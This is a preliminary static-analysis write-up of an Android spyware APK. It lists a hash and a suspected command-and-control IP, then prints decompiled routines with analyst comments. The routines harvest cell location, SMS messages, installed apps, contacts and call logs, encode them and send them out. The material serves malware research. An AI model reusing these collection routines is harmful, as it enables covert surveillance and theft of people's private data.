Russian Malware Write-up First Findings

TLDR

MD5 6f7523d3019fa190499f327211e01fcb

Possible C&C (command-and-control) server: http://69.90.132.215/

Tweet that started this: https://twitter.com/DAlperovitch/status/811800231377510400

Functionality

This is a quick write-up of preliminary findings on the APK that CrowdStrike tweeted about. The APKs that I’ve been able to get my hands on have been unable to install, so these findings are based on static analysis of the classes.dex files. Special thanks to Patrick Wardle and Tim Strazzere.

Location data

 if(((TelephonyManager)v23).getPhoneType() == 1) {
            v16 = ((TelephonyManager)v23).getCellLocation();
            if(v16 != null) {
                v21 = "LAC: " + ((GsmCellLocation)v16).getLac() + ", " + "CID: " + ((GsmCellLocation)v16).getCid();
            }

            v24 = "GSM";
        }

        if(((TelephonyManager)v23).getPhoneType() == 2) {
            v16 = ((TelephonyManager)v23).getCellLocation();
            if(v16 != null) {
                v8 = ((CdmaCellLocation)v16).getBaseStationId();
                v7 = ((CdmaCellLocation)v16).getBaseStationLongitude();
                v6 = ((CdmaCellLocation)v16).getBaseStationLatitude();
            }

            v21 = "Base Station Id: " + v8 + ", " + "Base Station Longitude: " + v7 + ", " + "Base Station Latitude: " + v6;
            v24 = "CDMA";
        }

        int v10 = ((TelephonyManager)v23).getSimState();
        String v17 = ((TelephonyManager)v23).getSimCountryIso();
        String v22 = v10 == 5 ? ((TelephonyManager)v23).getSimOperator() : "unknown";

Grabbing SMS history


            label_29:
                while(v39 < v30.getCount()) {
                    String v21 = v30.getString(v30.getColumnIndexOrThrow("body")).toString();
                    String v45 = v30.getString(v30.getColumnIndexOrThrow("address")).toString();
                    Date v49 = new Date(Long.valueOf(v30.getString(v30.getColumnIndexOrThrow("date")).toString()).longValue());
                    String v56 = null;
                    switch(Integer.parseInt(v30.getString(v30.getColumnIndexOrThrow("type")).toString())) {
                        case 1: {
                            v56 = "INBOX";
                            break;
                        }
                        case 2: {
                            v56 = "SENT";
                            break;
                        }
                        case 3: {
                            v56 = "DRAFT";
                            break;
                        }
                    }

                    v53.append("<br>Phone Number:--- " + v45 + " <br>Message Type:--- " + v56 + " <br>Message Date:--- " + v49 + " <br>Message Body:--- " + v21);
                    v53.append("<br>----------------------------------");
                    v30.moveToNext();
                    ++v39;
                }

Installed applications

  /**
   * Enumerates installed packages and hands an HTML-formatted, Base64-encoded
   * listing to {@code ReqP} together with the status marker "CMD 106 success".
   *
   * <p>Analyst notes on this decompiled method (local names are decompiler-assigned):
   * <ul>
   *   <li>{@code v8} is fixed to {@code true}, so every package whose
   *       {@code flags & 1} ({@code FLAG_SYSTEM}) is set is skipped; only
   *       non-system apps end up in the report.</li>
   *   <li>{@code (flags & 128) == 1} can never be true (the masked value is 0 or 128),
   *       so that first branch is dead; 128 is {@code FLAG_UPDATED_SYSTEM_APP}.</li>
   *   <li>{@code ReqP} is not shown in this excerpt; from
   *       {@code .execute(new String[0])} it looks like an AsyncTask that transmits the
   *       payload -- confirm against its source.</li>
   *   <li>{@code this.stopSelf()} implies the enclosing class is an Android Service that
   *       shuts itself down once the report has been queued.</li>
   *   <li>The fixed wrapper strings ({@code "CMD 106 success"}, the
   *       {@code <pre><font ...>} markup) are stable and useful as static indicators.</li>
   * </ul>
   */
  public void GetAppList() {
        Boolean v8 = Boolean.valueOf(true); // never changed: system apps are always excluded below
        int v3 = 1; // running index printed as "App N:"
        PackageManager v6 = this.getPackageManager();
        List v1 = v6.getInstalledApplications(0); // raw ApplicationInfo list, no flags filtering
        ArrayList v5 = new ArrayList(); // collected but never read after the loop
        String v7 = String.valueOf(String.valueOf("<pre><font size=4 color=green><br>CMD 106 success</font>") + "<font size=4 color=blue>") + "<br>";
        Iterator v10 = v1.iterator();
        while(v10.hasNext()) {
            Object v0 = v10.next();
            // Dead branch: (flags & 128) is either 0 or 128, never 1.
            if((((ApplicationInfo)v0).flags & 128) == 1) {
                ((List)v5).add(v0);
                continue;
            }

            // FLAG_SYSTEM set: because v8 is always true this 'continue' is always taken,
            // so the "System App N:" line below is unreachable in this build.
            if((((ApplicationInfo)v0).flags & 1) == 1) {
                if(v8.booleanValue()) {
                    continue;
                }

                ((List)v5).add(v0);
                v7 = String.valueOf(v7) + "System App " + v3 + ": " + v6.getApplicationLabel(((ApplicationInfo)v0)) + "( " + ((ApplicationInfo)v0).packageName + " )" + "  ";
                ++v3;
                continue;
            }

            // User-installed app: label and package name appended to the report.
            ((List)v5).add(v0);
            v7 = String.valueOf(v7) + "App " + v3 + ": " + v6.getApplicationLabel(((ApplicationInfo)v0)) + "( " + ((ApplicationInfo)v0).packageName + " )" + "  ";
            ++v3;
        }

        // Report is Base64-encoded (android.util.Base64, flags 0) and passed to ReqP with code 100.
        // NOTE(review): as decompiled, getBytes() binds only to the literal, which would not
        // type-check against Base64.encode(byte[], int); the original is most likely
        // (v7 + "</font></pre>").getBytes() -- a decompiler precedence artifact, verify in the dex.
        new ReqP(((Context)this), 100, new String(Base64.encode(String.valueOf(v7) + "</font></pre>".getBytes(), 0))).execute(new String[0]);
        this.stopSelf();
    }

Grabbing contacts


    /**
     * Dumps the device address book (names, phone numbers, e-mail addresses) into an
     * HTML-formatted, Base64-encoded report and hands it to {@code ReqP} with the status
     * marker "CMD 104 success"; an empty address book yields a "NO CONTACTS !!!" report instead.
     *
     * <p>Analyst notes on this decompiled method (local names are decompiler-assigned):
     * <ul>
     *   <li>Reads {@code ContactsContract.Contacts}, then for each contact that has a phone
     *       number queries the Phone and Email data tables by {@code contact_id}; this requires
     *       the READ_CONTACTS permission in the manifest.</li>
     *   <li>{@code v22} is dereferenced at {@code moveToFirst()} before the {@code != null}
     *       check at {@code label_124}, so a null cursor from the provider would crash here.</li>
     *   <li>The {@code goto label_124} is a decompiler artifact; since {@code moveToFirst()}
     *       only succeeds on a non-empty cursor, the {@code getCount() <= 0} branch is
     *       effectively unreachable.</li>
     *   <li>{@code ReqP} is not shown in this excerpt; from {@code .execute(new String[0])}
     *       it looks like an AsyncTask that transmits the payload -- confirm against its source.</li>
     *   <li>{@code this.stopSelf()} implies the enclosing class is an Android Service.</li>
     * </ul>
     */
    public void fetchContacts() {
        Uri v3 = ContactsContract$Contacts.CONTENT_URI;
        String v19 = "_id";
        String v12 = "display_name";
        String v15 = "has_phone_number";
        Uri v17 = ContactsContract$CommonDataKinds$Phone.CONTENT_URI;
        String v18 = "contact_id";
        String v16 = "data1"; // phone number column
        Uri v14 = ContactsContract$CommonDataKinds$Email.CONTENT_URI;
        String v13 = "contact_id";
        String v11 = "data1"; // e-mail address column
        StringBuffer v28 = new StringBuffer(); // accumulated report body
        ContentResolver v2 = this.getContentResolver();
        Cursor v22 = v2.query(v3, null, null, null, null); // all contacts, all columns
        Boolean v10 = Boolean.valueOf(false);
        // Null cursor would throw here; the null check only happens at label_124.
        if(v22.moveToFirst()) {
            v10 = Boolean.valueOf(true);
        }

        if(v10.booleanValue()) {
            if(v22.getCount() <= 0) {
                goto label_124; // decompiler artifact; practically unreachable after a successful moveToFirst()
            }

            do {
                String v21 = v22.getString(v22.getColumnIndex(v19));
                String v27 = v22.getString(v22.getColumnIndex(v12));
                // Contacts without a phone number are skipped entirely (their e-mails too).
                if(Integer.parseInt(v22.getString(v22.getColumnIndex(v15))) > 0) {
                    v28.append("<br>Name: " + v27);
                    Cursor v29 = v2.query(v17, null, String.valueOf(v18) + " = ?", new String[]{v21}, null);
                    while(v29.moveToNext()) {
                        v28.append("<br>Phone number: " + v29.getString(v29.getColumnIndex(v16)));
                    }

                    v29.close();
                    Cursor v25 = v2.query(v14, null, String.valueOf(v13) + " = ?", new String[]{v21}, null);
                    while(v25.moveToNext()) {
                        v28.append("<br>E-mail: " + v25.getString(v25.getColumnIndex(v11)));
                    }

                    v25.close();
                    v28.append("<br>");
                }
            }
            while(v22.moveToNext());

            // Success report: Base64 (android.util.Base64, flags 0) of the HTML wrapper plus body.
            // NOTE(review): as decompiled, getBytes() binds only to the last literal; the
            // original is most likely (...).getBytes() over the whole string -- verify in the dex.
            new ReqP(this, 100, new String(Base64.encode(String.valueOf("<pre><font size=4 color=green><br>CMD 104 success</font>") + "<font size=4 color=blue><br>" + v28 + "</font></pre>".getBytes(), 0))).execute(new String[0]);
            this.stopSelf();
        }
        else {
            // Empty address book: same "CMD 104 success" marker, red "NO CONTACTS !!!" body.
            new ReqP(this, 100, new String(Base64.encode(String.valueOf("<pre><font size=4 color=green><br>CMD 104 success</font>") + "<font size=4 color=red><br>NO CONTACTS !!!</font></pre>".getBytes(), 0))).execute(new String[0]);
            this.stopSelf();
        }

    label_124:
        if(v22 != null) {
            v22.close();
        }
    }

Call history / logs

 /**
  * Dumps the device call log (number, direction, timestamp, duration) into an
  * HTML-formatted, Base64-encoded report and hands it to {@code ReqP} with the status
  * marker "CMD 102 success".
  *
  * <p>Analyst notes on this decompiled method (local names are decompiler-assigned):
  * <ul>
  *   <li>Queries {@code CallLog.Calls.CONTENT_URI} with no selection, i.e. the whole log;
  *       this requires the READ_CALL_LOG permission in the manifest.</li>
  *   <li>The type codes 1/2/3 are mapped to INCOMING/OUTGOING/MISSED, matching
  *       {@code CallLog.Calls.INCOMING_TYPE}, {@code OUTGOING_TYPE} and {@code MISSED_TYPE};
  *       any other type leaves the label {@code null}.</li>
  *   <li>The cursor is not null-checked before {@code getColumnIndex}, so an unavailable
  *       provider would crash here.</li>
  *   <li>{@code ReqP} is not shown in this excerpt; from {@code .execute(new String[0])}
  *       it looks like an AsyncTask that transmits the payload -- confirm against its source.</li>
  *   <li>The closing brace of this method is not part of the excerpt.</li>
  * </ul>
  */
 private void getCallDetails() {
        String v22 = "<pre><font size=4 color=green><br>CMD 102 success</font>"; // report header / marker
        StringBuffer v21 = new StringBuffer(); // accumulated report body
        Cursor v18 = this.getContentResolver().query(CallLog$Calls.CONTENT_URI, null, null, null, null);
        int v19 = v18.getColumnIndex("number");
        int v23 = v18.getColumnIndex("type");
        int v14 = v18.getColumnIndex("date");
        int v17 = v18.getColumnIndex("duration");
        v21.append("<br>***************Call Log*************** :");
        while(v18.moveToNext()) {
            String v20 = v18.getString(v19);
            String v12 = v18.getString(v23);
            Date v10 = new Date(Long.valueOf(v18.getString(v14)).longValue()); // epoch millis -> Date
            String v11 = v18.getString(v17);
            String v15 = null; // stays null for type codes other than 1..3
            switch(Integer.parseInt(v12)) {
                case 1: {
                    v15 = "INCOMING";
                    break;
                }
                case 2: {
                    v15 = "OUTGOING";
                    break;
                }
                case 3: {
                    v15 = "MISSED";
                    break;
                }
            }

            v21.append("<br>Phone Number:--- " + v20 + "<br>Call Type:--- " + v15 + "<br>Call Date:--- " + v10 + "<br>Call duration in sec :--- " + v11);
            v21.append("<br>----------------------------------");
        }

        v18.close();
        // Report is Base64-encoded (android.util.Base64, flags 0) and passed to ReqP with code 100.
        // NOTE(review): as decompiled, getBytes() binds only to the "</pre>" literal; the
        // original is most likely (v22 + v21 + "</pre>").getBytes() -- verify in the dex.
        new ReqP(this, 100, new String(Base64.encode(String.valueOf(v22) + v21 + "</pre>".getBytes(), 0))).execute(new String[0]);
        this.stopSelf();

Unusual behavior

Breaks JEB

Breaks apktool

aapt doesn't work either :(